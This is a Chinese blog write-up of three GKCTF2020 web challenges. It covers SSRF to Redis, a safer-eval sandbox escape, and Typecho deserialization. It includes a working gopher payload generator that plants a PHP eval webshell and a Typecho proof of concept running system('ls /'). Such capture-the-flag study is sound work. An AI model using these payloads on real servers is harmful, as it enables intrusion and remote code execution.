[GKCTF2020]EZ三剑客 记录

最新推荐文章于 2024-01-02 14:46:38 发布
最新推荐文章于 2024-01-02 14:46:38 发布
阅读量983 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/107166263
版权

EzWeb

在这里插入图片描述
发个url发现一直卡在那里
在这里插入图片描述
发现有个secret
在这里插入图片描述
进去之后弹出linux 查询网卡信息的内容
给出了服务器ip,记录下ip地址
我们访问下ip
在这里插入图片描述
结果弹出两,不难发现是个SSRF
SSRF漏洞利用讲解
根据上面文章,我们利用file协议读取下index.php
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
那试试扫端口
在这里插入图片描述
个人喜欢写脚本,不喜欢用bp,用bp也可以(这里还需要扫内网主机)
从1-255爆破ip最后一段即可
在这里插入图片描述
发现是11
在这里插入图片描述
然后扫端口
在网上找了个脚本扫端口
脚本作者链接

这个脚本和nmap好像都跑不出来…
用bp吧。。

把ip改为扫到的内网主机ip,从0-65535开始扫

在这里插入图片描述
发现6379端口,可以用gopher协议攻击redis

攻击redis的方法以及EXP
本人是废物,写不出这种exp
这是python2的,改下ip 放kali里去

import urllib
protocol="gopher://"
ip="173.107.98.10"
port="6379"
shell="\n\n<?php eval($_GET[\"cmd\"]);?>\n\n"
filename="shell.php"
path="/var/www/html"
passwd=""
cmd=["flushall",
	 "set 1 {}".format(shell.replace(" ","${IFS}")),
	 "config set dir {}".format(path),
	 "config set dbfilename {}".format(filename),
	 "save"
	 ]
if passwd:
	cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
	CRLF="\r\n"
	redis_arr = arr.split(" ")
	cmd=""
	cmd+="*"+str(len(redis_arr))
	for x in redis_arr:
		cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
	cmd+=CRLF
	return cmd

if __name__=="__main__":
	for x in cmd:
		payload += urllib.quote(redis_format(x))
	print payload

将生成的payload直接放过打
在这里插入图片描述
暂时不知道为什么一定要在那个url框中输入
在这里插入图片描述
应该是url编码的问题

传过后,再访问shell.php
记住需要绕空格
在这里插入图片描述
发现flag在根目录下,查看即可

EzNode

const express = require('express');
const bodyParser = require('body-parser');

const saferEval = require('safer-eval'); // 2019.7/WORKER1 找到一个很棒的库

const fs = require('fs');

const app = express();


app.use(bodyParser.urlencoded({ extended: false }));
app.use(bodyParser.json());

// 2020.1/WORKER2 老板说为了后期方便优化
app.use((req, res, next) => {
  if (req.path === '/eval') {
    let delay = 60 * 1000;
    console.log(delay);
    if (Number.isInteger(parseInt(req.query.delay))) {
      delay = Math.max(delay, parseInt(req.query.delay));
    }
    const t = setTimeout(() => next(), delay);
    // 2020.1/WORKER3 老板说让我优化一下速度,我就直接这样写了,其他人写了啥关我p事
    setTimeout(() => {
      clearTimeout(t);
      console.log('timeout');
      try {
        res.send('Timeout!');
      } catch (e) {

      }
    }, 1000);
  } else {
    next();
  }
});

app.post('/eval', function (req, res) {
  let response = '';
  if (req.body.e) {
    try {
      response = saferEval(req.body.e);
    } catch (e) {
      response = 'Wrong Wrong Wrong!!!!';
    }
  }
  res.send(String(response));
});

// 2019.10/WORKER1 老板娘说她要看到我们的源代码,用行数计算KPI
app.get('/source', function (req, res) {
  res.set('Content-Type', 'text/javascript;charset=utf-8');
  res.send(fs.readFileSync('./index.js'));
});

// 2019.12/WORKER3 为了方便我自己查看版本,加上这个接口
app.get('/version', function (req, res) {
  res.set('Content-Type', 'text/json;charset=utf-8');
  res.send(fs.readFileSync('./package.json'));
});

app.get('/', function (req, res) {
  res.set('Content-Type', 'text/html;charset=utf-8');
  res.send(fs.readFileSync('./index.html'))
})

app.listen(80, '0.0.0.0', () => {
  console.log('Start listening')
});

简单说下主要的漏洞代码吧,现在对node.js还不是很熟。。。。。
在这里插入图片描述

这一大段主要是在/eval这个路由下,首先他先设置delay的默认值,我们可以去到这个路由把delay的值传过去,
然后他会比较传过去的值和默认值,选较大的一方作为自己的值。然后就是设置超时,将秒数delay作为超时时限,超时了就进到下一个路由

可是我们无论怎么发都不可能超过6秒
问题出在了SetTimeout这个函数
存在溢出
关于这个函数详细分析
在这里插入图片描述
只要大于2147483647,就会发生溢出,就可以绕过那个时间限制,进入下一个路由
在这里插入图片描述
可以发现已经绕过那个时间限制了
接着看下一个路由
在这里插入图片描述
他这里要我们post传参e,,就是要让我们沙盒逃逸

在这里插入图片描述
搜一波这个库的漏洞,搜到一个CVE
在这里插入图片描述
CVE漏洞POC
下面给出了更简单的POC,就是绝大多数wp的那个POC
在这里插入图片描述

https://github.com/commenthol/safer-eval/issues/10

把那个POC往上面放放,直接RCE
在这里插入图片描述
注意用法
在这里插入图片描述
查看根目录下flag

EzTypecho

在这里插入图片描述
是一个Typecho写的网站,搜搜这个东东有啥漏洞

Typecho漏洞分析

这上面已经讲得很清楚了
在这里插入图片描述

大概意思呢就是通过反序列化,调用call_user_func(),来RCE,具体不详说了,文章里里已经写的很清楚,网上别的文章也讲得不错

在这里插入图片描述
放过去之后弹出说没有session
这是题目给出的源码就起作用了
在这里插入图片描述
在这里插入图片描述

发现他把session给禁了,所以打不通

往下看
在这里插入图片描述
有个start,用样存在反序列化的问题

在这里插入图片描述
可以发现成功RCE
接着更改那篇文章的POC,拿flag

<?php
class Typecho_Request
{
    private $_params = array();
    private $_filter = array();

    public function __construct()
    {
        $this->_params['screenName'] = 'ls /';
        //$this->_params['screenName'] = -1;
        $this->_filter[0] = 'system';
    }
}

class Typecho_Feed
{
    const RSS2 = 'RSS 2.0';
    /** 定义ATOM 1.0类型 */
    const ATOM1 = 'ATOM 1.0';
    /** 定义RSS时间格式 */
    const DATE_RFC822 = 'r';
    /** 定义ATOM时间格式 */
    const DATE_W3CDTF = 'c';
    /** 定义行结束符 */
    const EOL = "\n";
    private $_type;
    private $_items = array();
    public $dateFormat;

    public function __construct()
    {
        $this->_type = self::RSS2;
        $item['link'] = '1';
        $item['title'] = '2';
        $item['date'] = 1507720298;
        $item['author'] = new Typecho_Request();
        $item['category'] = array(new Typecho_Request());

        $this->_items[0] = $item;
    }
}

$x = new Typecho_Feed();
$a = array(
    'host' => 'localhost',
    'user' => 'xxxxxx',
    'charset' => 'utf8',
    'port' => '3306',
    'database' => 'typecho',
    'adapter' => $x,
    'prefix' => 'typecho_'
);
echo urlencode(base64_encode(serialize($a)));
?>

在这里插入图片描述
查看根目录flag即可

penson by 小乌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[GKCTF2020]EZ三剑客-EzWeb
qq_40327508的博客
11-27 548
考点 ssrf redis反弹shell 打开网站,查看源代码 查看文件 访问下ip 经过测试是ssrf漏洞 使用burp爆破内网ip
第二周任务[GKCTF2020]
Lumos427的博客
03-26 608
[GKCTF2020]cve版签到 刚看是啥也不会,去百度了一下这题,发现这是一个ssrf漏洞(服务端请求伪造) 下面是在网上找到的介绍 漏洞详情 PHP(PHP:Hypertext Preprocessor,PHP:超文本预处理器)是PHPGroup和开放源代码社区的共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发,支持多种数据库及操作系统。 PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存
[GKCTF 2020]ez三剑客-eztypecho
最新发布
rev1ve的博客
01-02 647
如果有GET传参finish,则进入下面代码,如果有session值,那么unserialize函数反序列化,我们跟进到Typecho_Cookie::get()我们通过POST上传PHP_SESSION_UPLOAD_PROGRESS使得将上传文件信息保存到session,上传的文件就是files。得到payload后解决如何构造session,用的是PHP中的特性PHP_SESSION_UPLOAD_PROGRESS。的赋值逻辑,如果cookie存在key参数,那么该参数值赋值给。
buu [GKCTF2020]EzMachine wp
苗_的博客
09-10 827
今天终于沉下心看了一道vm逆向题了...wp我尽量写的详细一点qaq Part1 先拖进ida看一下,发现找不到什么关键函数,搜索字符串也搜不出什么。静态不大行我们就动调试试。 第一种 调试发现程序跳转到0x9B1595,和0x009B1594这一步对比发现0x009B1594会跑飞,所以初步判定它是混淆指令,到ida里把它nop掉。 其实nop掉的目的就是把0x9B1595这里创建函数然后反汇编,这样会更好分析一点。 直接nop肯定是不行的,会破坏掉0x9B1595这里的代码,要先ida动
EzMachine和DbgIsFun--GKCTF
re1wn
06-20 6115
GKCTF RE
2020 GKCTF
Hk_Mayfly的博客
05-30 580
Misc Pokémon 有点脑洞题,flag就在103国道那 flag{PokEmon_14_CutE} Crypto 小学生的密码学 e(x)=11x+6(mod26) 密文:welcylk 仿射密码,a=11,b=6 再base64就行 flag{c29yY2VyeQ==} babycrypto 2019强网杯challenge 2原题,RSA解密,...
GKCTF2020 web+misc
xlcvv的博客
05-25 1340
CheckIN(unsolved) 考点:代码审计,绕disable_functions 题目给了源码: <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() {
buu做题笔记——[BJDCTF2020]Mark loves cat&[MRCTF2020]Ez_bypass&[GKCTF2020]CheckIN
weixin_46330722的博客
11-05 585
BUU[BJDCTF2020]Mark loves cat[MRCTF2020]Ez_bypass [BJDCTF2020]Mark loves cat 进入题目是一个博客首页 点了半天没找到可以利用的点,用dirsearch扫一下 扫到.git目录,用Githack把源码down下来 看一下关键代码 //flag.php <?php $flag = file_get_contents('/flag'); //index.php <?php include 'flag.php';
EZ-USBFX2.rar_ez usb _ez-usb_ez-usb fx2
09-21
"EZ-USB FX2.rar_ez usb _ez-usb_ez-usb fx2"这个标题可能是指一个包含EZ-USB FX2相关资料的压缩文件,包括驱动程序和可能的技术文档。 **EZ-USB FX2关键特性** 1. **集成USB控制器**: EZ-USB FX2内含一个全速USB ...
GKCTF 2020 re
qq_37439229的博客
05-25 575
周末打了两场比赛 bjd GK,bjd我打自闭了,赛中只做出了两道题,赛后又才又做出一道。。。不得不说按道理我四道题都看懂了,知道方法怎么做,可是我不会写脚本啊。。。得加强python的编程能力了。。。 来说说GKCTF,(虽然还是只做出了3道题。。。。啥时能做到ak啊!!!!) checkin 密码HelloWorld,之后砖块游戏好了 Chelly’s identity 老二次元了。。。。 方法:动态调试,比较简单 a = [0x2,0x3,0x5,0x7,0xb,0xd,0x11,0x13
[GKCTF2020]EZ三剑客-EzNode
feng的博客
02-16 986
前言 之前buu上刷到这题的时候,感觉是个前端的题,就绕过没看了。今天在某平台做红包题遇到了基本上考点一样的题目,在学长的指引下又把这题给做了一下,总的来说还算比较友好,因为我不会前端我也大致能看懂这题是啥意思。 WP 进入环境是个计算器,看一下源代码: const express = require('express'); const bodyParser = require('body-parser'); const saferEval = require('safer-eval'); // 2019
[GKCTF2020]EZ三剑客-EzWeb(SSRF)
qq_45521281的博客
06-03 4643
查看源码发现提示: 在url里访问一下: 得到一串ifconfig的结果,整理一下的: eth0 Link encap:Ethernet HWaddr 02:42:ad:62:04:0a inet addr:173.96.119.10 Bcast:173.98.4.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1450 Metric:1 RX pac.
ctf php 流量分析题,GKCTF EZWEB的分析题解和思考
weixin_35674742的博客
03-09 502
GKCTF EZ三剑客-EzWeb看到这个题前端和我自己出的一个题实在是很像,同样是输入一个url,先看题目长啥样吧。嗯,啥也没有,输入url基本没反应,F12给的提示是?secret,输入后发现:这就很敏感了,相当于一个ifconfig的命令,这个时候应该是SSRF打内网,看内网的存活主机有多少,直接burp抓个包爆破一下有新发现:这个IP的其他端口有问题?不多说,nmap一把梭看看有哪些常见=...
eval-Bugku CTF
m0_56859693的博客
09-05 1483
今天在bugku刷到了一道基础题,感觉考察的很全面。 源代码如下 第一行 include是将flag.php包含在页面代码中,也不难推测flag在flag.php中 第二行 $_REQUEST可以将用户传入的hello传给服务器 第三行分两个部分:eval和var_dump var_dump即把输入的hello作为字符串string输出 eval则可以把字符串当作php代码执行 把hello赋值为system("ls") 发现包含flag.php和index.php ...
GKCTF2020WEB篇 wp
qq_43571759的博客
05-27 1773
GKCTF2020 WEB wp 文章目录GKCTF2020 WEB wp[GKCTF2020]CheckIN----bypass disable_functions[GKCTF2020]老八小超市儿----shopxo后台上传[GKCTF2020]cve版签到----CVE-2020-7066%00截断[GKCTF2020]EZ三剑客-EzWeb----SSRF和redis5.X未授权漏洞redis未授权漏洞复现[GKCTF2020]EZ三剑客-EzNode----Nodejs内置函数特性[GKCTF
GKCTF 2020(web)
weixin_43610673的博客
05-25 634
菜逼只能赛后复现 CheckIN Base64后即可rec,可以读文件,但不知道flag文件位置 看一下phpinfo 命令执行的函数都给ban完了 用蚁剑链接?Ginkgo=ZXZhbCgkX1BPU1RbY21kXSk7 连接成功之后根目录有readflag,和flag 那就是要执行readflag文件 PHP 7.0-7.3 disable_functions bypasss 直接打 改一下命令就行 Exp要传到/tmp 目录 别的没权限 页面去包含执行 老八小超市儿 和这个基本差不多
[GKCTF 2021]easynode
qq_61209261的博客
07-14 739
node原型链污染和WAF绕过 反弹shell
ez-usb单片机寄存器手册详解
ez-usb单片机寄存器手册 ez-usb单片机寄存器手册是Cypress Semiconductor Corporation发布的一份技术参考手册,旨在为开发者提供ez-usb单片机的寄存器信息。该手册详细介绍了ez-usb单片机的各种寄存器的内容,是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值